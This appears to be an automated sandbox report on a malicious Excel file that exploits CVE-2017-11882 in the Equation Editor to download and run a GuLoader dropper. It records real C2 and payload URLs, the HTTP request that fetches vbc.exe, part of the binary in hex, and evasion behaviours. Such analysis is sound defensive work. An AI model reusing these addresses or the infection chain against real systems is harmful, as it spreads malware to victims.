Windows Analysis Report Inquiry Sheet.xlsx

Overview

General Information

Sample Name: Inquiry Sheet.xlsx
Analysis ID: 482488
MD5: b079763f132db9b4d979256a28909892
SHA1: 3f8ef9821671cbc8267baa2c6e9a41a18af45f78
SHA256: 71db7caab688d41a1c6bca4cafbf782d50a670a7c7e73ad3000dea754959cf2e
Tags: VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Yara detected GuLoader
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to call native functions
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000006.00000002.677886509.0000000000320000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "http://37.0.11.217/WEALTHYREM_ecI"}
Multi AV Scanner detection for submitted file
Source: Inquiry Sheet.xlsx ReversingLabs: Detection: 26%
Antivirus detection for URL or domain
Source: http://212.192.246.25/excel/vbc.exe Avira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe ReversingLabs: Detection: 17%
Source: C:\Users\Public\vbc.exe ReversingLabs: Detection: 17%
Machine Learning detection for dropped file
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Joe Sandbox ML: detected

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior

Software Vulnerabilities:

barindex
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 212.192.246.25:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 212.192.246.25:80
Source: excel.exe Memory has grown: Private usage: 4MB later: 68MB

Networking:

barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://37.0.11.217/WEALTHYREM_ecI
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: RHC-HOSTINGGB RHC-HOSTINGGB
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 13 Sep 2021 18:16:54 GMTServer: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29Last-Modified: Sun, 12 Sep 2021 22:03:18 GMTETag: "22000-5cbd38416fb31"Accept-Ranges: bytesContent-Length: 139264Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d7 36 a4 c9 93 57 ca 9a 93 57 ca 9a 93 57 ca 9a 10 4b c4 9a 92 57 ca 9a dc 75 c3 9a 9a 57 ca 9a a5 71 c7 9a 92 57 ca 9a 52 69 63 68 93 57 ca 9a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b7 98 6b 48 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 c0 01 00 00 90 00 00 00 00 00 00 bc 14 00 00 00 10 00 00 00 d0 01 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 60 02 00 00 10 00 00 5c 62 02 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 c8 01 00 28 00 00 00 00 20 02 00 3a 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 02 00 00 20 00 00 00 00 10 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 00 bd 01 00 00 10 00 00 00 c0 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 58 45 00 00 00 d0 01 00 00 10 00 00 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 3a 3b 00 00 00 20 02 00 00 40 00 00 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /excel/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 212.192.246.25Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: vbc.exe, 00000006.00000002.678374726.0000000003220000.00000002.00020000.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: vbc.exe, 00000006.00000002.678374726.0000000003220000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com
Source: vbc.exe, 00000006.00000002.678374726.0000000003220000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com/
Source: vbc.exe, 00000006.00000002.678573420.0000000003407000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: vbc.exe, 00000006.00000002.678573420.0000000003407000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000006.00000002.678573420.0000000003407000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: vbc.exe, 00000006.00000002.678573420.0000000003407000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: BEC4B86A.emf.0.dr String found in binary or memory: http://www.day.com/dam/1.0
Source: vbc.exe, 00000006.00000002.678374726.0000000003220000.00000002.00020000.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: vbc.exe, 00000006.00000002.678573420.0000000003407000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: vbc.exe, 00000006.00000002.678374726.0000000003220000.00000002.00020000.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: vbc.exe, 00000006.00000002.678374726.0000000003220000.00000002.00020000.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BEC4B86A.emf Jump to behavior
Source: global traffic HTTP traffic detected: GET /excel/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 212.192.246.25Connection: Keep-Alive

System Summary:

barindex
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 6_2_00326928 6_2_00326928
Source: C:\Users\Public\vbc.exe Code function: 6_2_00323431 6_2_00323431
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032A439 6_2_0032A439
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032A42B 6_2_0032A42B
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032441B 6_2_0032441B
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032700F 6_2_0032700F
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032247B 6_2_0032247B
Source: C:\Users\Public\vbc.exe Code function: 6_2_00325063 6_2_00325063
Source: C:\Users\Public\vbc.exe Code function: 6_2_00320C67 6_2_00320C67
Source: C:\Users\Public\vbc.exe Code function: 6_2_00325C67 6_2_00325C67
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032A467 6_2_0032A467
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032AC6F 6_2_0032AC6F
Source: C:\Users\Public\vbc.exe Code function: 6_2_00323C6C 6_2_00323C6C
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032B444 6_2_0032B444
Source: C:\Users\Public\vbc.exe Code function: 6_2_003244AC 6_2_003244AC
Source: C:\Users\Public\vbc.exe Code function: 6_2_00323897 6_2_00323897
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032B498 6_2_0032B498
Source: C:\Users\Public\vbc.exe Code function: 6_2_00325885 6_2_00325885
Source: C:\Users\Public\vbc.exe Code function: 6_2_00329088 6_2_00329088
Source: C:\Users\Public\vbc.exe Code function: 6_2_003238E6 6_2_003238E6
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032B4E4 6_2_0032B4E4
Source: C:\Users\Public\vbc.exe Code function: 6_2_003270D8 6_2_003270D8
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032A92B 6_2_0032A92B
Source: C:\Users\Public\vbc.exe Code function: 6_2_00320D2C 6_2_00320D2C
Source: C:\Users\Public\vbc.exe Code function: 6_2_00326110 6_2_00326110
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032491E 6_2_0032491E
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032A51F 6_2_0032A51F
Source: C:\Users\Public\vbc.exe Code function: 6_2_00321504 6_2_00321504
Source: C:\Users\Public\vbc.exe Code function: 6_2_00325508 6_2_00325508
Source: C:\Users\Public\vbc.exe Code function: 6_2_00329176 6_2_00329176
Source: C:\Users\Public\vbc.exe Code function: 6_2_00325967 6_2_00325967
Source: C:\Users\Public\vbc.exe Code function: 6_2_00325168 6_2_00325168
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032195B 6_2_0032195B
Source: C:\Users\Public\vbc.exe Code function: 6_2_00329D5B 6_2_00329D5B
Source: C:\Users\Public\vbc.exe Code function: 6_2_00325D58 6_2_00325D58
Source: C:\Users\Public\vbc.exe Code function: 6_2_00324548 6_2_00324548
Source: C:\Users\Public\vbc.exe Code function: 6_2_003211B3 6_2_003211B3
Source: C:\Users\Public\vbc.exe Code function: 6_2_003215B7 6_2_003215B7
Source: C:\Users\Public\vbc.exe Code function: 6_2_003271A4 6_2_003271A4
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032559E 6_2_0032559E
Source: C:\Users\Public\vbc.exe Code function: 6_2_00320D82 6_2_00320D82
Source: C:\Users\Public\vbc.exe Code function: 6_2_003229FE 6_2_003229FE
Source: C:\Users\Public\vbc.exe Code function: 6_2_003255FE 6_2_003255FE
Source: C:\Users\Public\vbc.exe Code function: 6_2_003245D0 6_2_003245D0
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032A5D1 6_2_0032A5D1
Source: C:\Users\Public\vbc.exe Code function: 6_2_003239C3 6_2_003239C3
Source: C:\Users\Public\vbc.exe Code function: 6_2_003269C1 6_2_003269C1
Source: C:\Users\Public\vbc.exe Code function: 6_2_00322A39 6_2_00322A39
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032B61F 6_2_0032B61F
Source: C:\Users\Public\vbc.exe Code function: 6_2_00322E00 6_2_00322E00
Source: C:\Users\Public\vbc.exe Code function: 6_2_00320A79 6_2_00320A79
Source: C:\Users\Public\vbc.exe Code function: 6_2_00325260 6_2_00325260
Source: C:\Users\Public\vbc.exe Code function: 6_2_00325E65 6_2_00325E65
Source: C:\Users\Public\vbc.exe Code function: 6_2_00329A5E 6_2_00329A5E
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032AA40 6_2_0032AA40
Source: C:\Users\Public\vbc.exe Code function: 6_2_00325A4A 6_2_00325A4A
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032324A 6_2_0032324A
Source: C:\Users\Public\vbc.exe Code function: 6_2_00321248 6_2_00321248
Source: C:\Users\Public\vbc.exe Code function: 6_2_00326649 6_2_00326649
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032164F 6_2_0032164F
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032A24C 6_2_0032A24C
Source: C:\Users\Public\vbc.exe Code function: 6_2_003232A8 6_2_003232A8
Source: C:\Users\Public\vbc.exe Code function: 6_2_003266AC 6_2_003266AC
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032A69A 6_2_0032A69A
Source: C:\Users\Public\vbc.exe Code function: 6_2_00320A8A 6_2_00320A8A
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032268D 6_2_0032268D
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032B2F3 6_2_0032B2F3
Source: C:\Users\Public\vbc.exe Code function: 6_2_00326EFC 6_2_00326EFC
Source: C:\Users\Public\vbc.exe Code function: 6_2_003216E0 6_2_003216E0
Source: C:\Users\Public\vbc.exe Code function: 6_2_003226E6 6_2_003226E6
Source: C:\Users\Public\vbc.exe Code function: 6_2_003256D0 6_2_003256D0
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032A2D7 6_2_0032A2D7
Source: C:\Users\Public\vbc.exe Code function: 6_2_00326EC1 6_2_00326EC1
Source: C:\Users\Public\vbc.exe Code function: 6_2_00323AC8 6_2_00323AC8
Source: C:\Users\Public\vbc.exe Code function: 6_2_00329B34 6_2_00329B34
Source: C:\Users\Public\vbc.exe Code function: 6_2_00326F39 6_2_00326F39
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032532A 6_2_0032532A
Source: C:\Users\Public\vbc.exe Code function: 6_2_00325B77 6_2_00325B77
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032436B 6_2_0032436B
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032B358 6_2_0032B358
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032A341 6_2_0032A341
Source: C:\Users\Public\vbc.exe Code function: 6_2_00321347 6_2_00321347
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032A3B8 6_2_0032A3B8
Source: C:\Users\Public\vbc.exe Code function: 6_2_003237B9 6_2_003237B9
Source: C:\Users\Public\vbc.exe Code function: 6_2_003233A2 6_2_003233A2
Source: C:\Users\Public\vbc.exe Code function: 6_2_003237A0 6_2_003237A0
Source: C:\Users\Public\vbc.exe Code function: 6_2_003257A6 6_2_003257A6
Source: C:\Users\Public\vbc.exe Code function: 6_2_00324F91 6_2_00324F91
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032B39C 6_2_0032B39C
Source: C:\Users\Public\vbc.exe Code function: 6_2_00323B83 6_2_00323B83
Source: C:\Users\Public\vbc.exe Code function: 6_2_00323BF7 6_2_00323BF7
Source: C:\Users\Public\vbc.exe Code function: 6_2_00329BF4 6_2_00329BF4
Source: C:\Users\Public\vbc.exe Code function: 6_2_003253F9 6_2_003253F9
Source: C:\Users\Public\vbc.exe Code function: 6_2_003213ED 6_2_003213ED
Source: C:\Users\Public\vbc.exe Code function: 6_2_003217D0 6_2_003217D0
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032A7CC 6_2_0032A7CC
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 6_2_00326928 NtAllocateVirtualMemory, 6_2_00326928
Source: C:\Users\Public\vbc.exe Code function: 6_2_003269C1 NtAllocateVirtualMemory, 6_2_003269C1
Source: C:\Users\Public\vbc.exe Code function: 6_2_00326A91 NtAllocateVirtualMemory, 6_2_00326A91
Source: C:\Users\Public\vbc.exe Code function: 6_2_00326B75 NtAllocateVirtualMemory, 6_2_00326B75
Abnormal high CPU Usage
Source: C:\Users\Public\vbc.exe Process Stats: CPU usage > 98%
PE file contains strange resources
Source: vbc[1].exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: Inquiry Sheet.xlsx ReversingLabs: Detection: 26%
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$Inquiry Sheet.xlsx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRE407.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@4/27@0/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: vbc.exe, 00000006.00000002.678374726.0000000003220000.00000002.00020000.sdmp Binary or memory string: .VBPud<_
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior

Data Obfuscation:

barindex
Yara detected GuLoader
Source: Yara match File source: 00000006.00000002.677886509.0000000000320000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 6_2_00402B34 push esi; retn 000Ch 6_2_00419669
Source: C:\Users\Public\vbc.exe Code function: 6_2_00405C5A pushad ; iretd 6_2_00405C5B
Source: C:\Users\Public\vbc.exe Code function: 6_2_00407D62 push edi; iretd 6_2_00407D68
Source: C:\Users\Public\vbc.exe Code function: 6_2_00408701 push esi; ret 6_2_00408702
Source: C:\Users\Public\vbc.exe Code function: 6_2_0040631B push es; iretd 6_2_0040631F
Source: C:\Users\Public\vbc.exe Code function: 6_2_00409134 push ebp; ret 6_2_0040915D
Source: C:\Users\Public\vbc.exe Code function: 6_2_004089D5 push eax; ret 6_2_004089D6
Source: C:\Users\Public\vbc.exe Code function: 6_2_00405F90 push ds; retf 6_2_00405FD3
Source: C:\Users\Public\vbc.exe Code function: 6_2_003242B8 pushad ; retf 6_2_0032433D
Source: initial sample Static PE information: section name: .text entropy: 7.07203430098
Source: initial sample Static PE information: section name: .text entropy: 7.07203430098

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
